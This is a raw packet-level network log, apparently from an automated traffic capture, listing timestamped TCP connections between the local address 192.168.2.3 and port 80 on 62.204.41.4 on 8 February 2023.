                                                                    Feb 8, 2023 21:32:25.724009991 CET4994980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:25.725616932 CET4995080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:25.785469055 CET804995062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:25.785531044 CET804994962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:25.785661936 CET4995080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:25.785713911 CET4994980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:25.900036097 CET4995080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:25.960030079 CET804995062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:25.963053942 CET804995062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:25.963211060 CET4995080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.149907112 CET4995080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.151293993 CET4995180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.209899902 CET804995062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.210099936 CET4995080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.213836908 CET804995162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.213946104 CET4995180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.219929934 CET4995180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.282588005 CET804995162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.287198067 CET804995162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.287329912 CET4995180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.457617998 CET4995180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.460715055 CET4995280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.520378113 CET804995262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.520417929 CET804995162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.520734072 CET4995180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.520750046 CET4995280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.521262884 CET4995280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.580785036 CET804995262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.584475040 CET804995262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.584678888 CET4995280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.704582930 CET4995280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.764379025 CET804995262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.771636009 CET4995280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.802339077 CET4995380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.864110947 CET804995362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.867304087 CET4995380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.867865086 CET4995380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:26.930051088 CET804995362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.933233023 CET804995362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:26.935547113 CET4995380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.052084923 CET4995380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.052906990 CET4995480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.112313986 CET804995462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.112545013 CET4995480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.113818884 CET4995480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.113929033 CET804995362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.116626024 CET4995380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.174097061 CET804995462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.177083015 CET804995462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.184756041 CET4995480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.296056032 CET4995480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.297101021 CET4995580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.356018066 CET804995462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.359059095 CET4995480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.359342098 CET804995562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.359549999 CET4995580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.359899998 CET4995580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.422033072 CET804995562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.424393892 CET804995562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.426541090 CET4995580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.542870045 CET4995580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.543557882 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.604844093 CET804995562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.605061054 CET4995580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.606156111 CET804995662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.607388973 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.633042097 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.695815086 CET804995662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.698436975 CET804995662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.699013948 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.814308882 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.815896034 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.877183914 CET804995662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.877351999 CET4995680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.878431082 CET804995762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.879365921 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.889281034 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:27.951901913 CET804995762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.954535961 CET804995762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:27.957051039 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.082056046 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.083029985 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.144563913 CET804995862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.144604921 CET804995762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.144660950 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.144691944 CET4995780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.145173073 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.206587076 CET804995862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.210447073 CET804995862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.228341103 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.348908901 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.349653006 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.410273075 CET804995962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.410593987 CET804995862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.421859980 CET4995880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.422446966 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.422446966 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.482812881 CET804995962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.485539913 CET804995962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.485687017 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.603312969 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.606627941 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.664089918 CET804995962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.666167021 CET804996062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.667319059 CET4995980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.667413950 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.668791056 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.728353977 CET804996062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.731478930 CET804996062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.738429070 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.857923031 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.874214888 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.917980909 CET804996062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.926455021 CET4996080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.936271906 CET804996162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:28.941096067 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:28.958110094 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.019805908 CET804996162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.022146940 CET804996162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.024748087 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.192774057 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.193744898 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.254647970 CET804996162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.254826069 CET4996180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.256095886 CET804996262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.256236076 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.257081032 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.319484949 CET804996262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.324227095 CET804996262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.324346066 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.441129923 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.442296982 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.503714085 CET804996262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.503753901 CET804996362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.503873110 CET4996280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.503937006 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.504400969 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.565964937 CET804996362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.568942070 CET804996362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.569083929 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.692049980 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.692888975 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.753736973 CET804996362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.754578114 CET804996462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.754889965 CET4996380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.754959106 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.755517960 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.817121983 CET804996462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.820144892 CET804996462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:29.820342064 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.940877914 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:29.941720963 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.002389908 CET804996562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.002543926 CET804996462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.016753912 CET4996480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.017047882 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.025254965 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.086041927 CET804996562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.089925051 CET804996562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.095613956 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.201741934 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.213459969 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.262533903 CET804996562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.262758970 CET4996580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.274039984 CET804996662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.274279118 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.274781942 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.335030079 CET804996662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.337826014 CET804996662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.337959051 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.450472116 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.451639891 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.510925055 CET804996662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.512998104 CET804996762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.514307022 CET4996680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.514399052 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.528686047 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.590224981 CET804996762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.592782021 CET804996762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.592926025 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.703388929 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.704322100 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.768702984 CET804996862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.768723011 CET804996762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.769690037 CET4996780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.769860029 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.770420074 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.831453085 CET804996862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.833966017 CET804996862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:30.836036921 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.950318098 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:30.951184988 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.011223078 CET804996862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.011703014 CET804996962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.016067028 CET4996880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.016151905 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.022856951 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.083401918 CET804996962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.088211060 CET804996962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.088380098 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.226295948 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.227262020 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.287168980 CET804996962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.287844896 CET804997062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.298402071 CET4996980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.298415899 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.302961111 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.363755941 CET804997062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.366622925 CET804997062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.370374918 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.488183022 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.489048004 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.548485041 CET804997162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.548583031 CET804997062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.548739910 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.549215078 CET4997080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.549737930 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.608989000 CET804997162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.611403942 CET804997162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.617861986 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.871534109 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.931050062 CET804997162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:31.949146032 CET4997180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:31.971997023 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.032541037 CET804997262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.051207066 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.067364931 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.127958059 CET804997262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.132452011 CET804997262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.153002024 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.325198889 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.326534033 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.392024994 CET804997262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.392398119 CET804997362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.397367001 CET4997280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.397388935 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.423801899 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.484474897 CET804997362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.487102985 CET804997362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.502238989 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.681669950 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.683171034 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.742356062 CET804997362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.743261099 CET4997380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.746047974 CET804997462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.750236988 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.751955986 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:32.814660072 CET804997462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.816646099 CET804997462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:32.820398092 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:33.812056065 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:33.812931061 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:33.881891012 CET804997462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:33.902159929 CET4997480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:34.899807930 CET804997562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:34.900022984 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.139303923 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.201030016 CET804997562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:35.204358101 CET804997562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:35.204521894 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.326080084 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.330909967 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.387120008 CET804997562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:35.387310982 CET4997580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:35.393584967 CET804997662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:35.393871069 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.257085085 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.319747925 CET804997662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.324114084 CET804997662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.324233055 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.430207014 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.430953979 CET4997780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.492502928 CET804997762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.492677927 CET804997662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.492701054 CET4997780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.493086100 CET4997680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.501859903 CET4997780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.563509941 CET804997762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.565764904 CET804997762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.565890074 CET4997780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.680538893 CET4997780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.681422949 CET4997880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.742289066 CET804997762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.742459059 CET4997780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.742841005 CET804997862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.742968082 CET4997880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.743998051 CET4997880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.805325985 CET804997862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.808079958 CET804997862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.808317900 CET4997880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.914942980 CET4997880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.915630102 CET4997980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.975213051 CET804997962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.975738049 CET4997980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.976414919 CET804997862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:36.976517916 CET4997880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:36.980540037 CET4997980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.039855957 CET804997962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.043481112 CET804997962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.043739080 CET4997980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.149380922 CET4997980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.151086092 CET4998080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.209110975 CET804997962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.209270954 CET4997980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.212018967 CET804998062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.212255001 CET4998080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.216068983 CET4998080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.276814938 CET804998062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.279519081 CET804998062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.279707909 CET4998080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.386406898 CET4998080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.388098001 CET4998180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.447128057 CET804998062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.447319984 CET4998080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.448611021 CET804998162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.448837042 CET4998180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.449608088 CET4998180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.510046959 CET804998162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.512573004 CET804998162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.512743950 CET4998180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.618993998 CET4998180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.620629072 CET4998280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.679676056 CET804998162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.679877043 CET4998180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.681288004 CET804998262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.681497097 CET4998280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.682518959 CET4998280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.742863894 CET804998262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.745387077 CET804998262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.745703936 CET4998280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.861215115 CET4998280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.862020969 CET4998380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.921658993 CET804998262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.921871901 CET4998280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.923512936 CET804998362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.923667908 CET4998380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.924287081 CET4998380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:37.985888004 CET804998362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.988426924 CET804998362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:37.988553047 CET4998380192.168.2.362.204.41.4
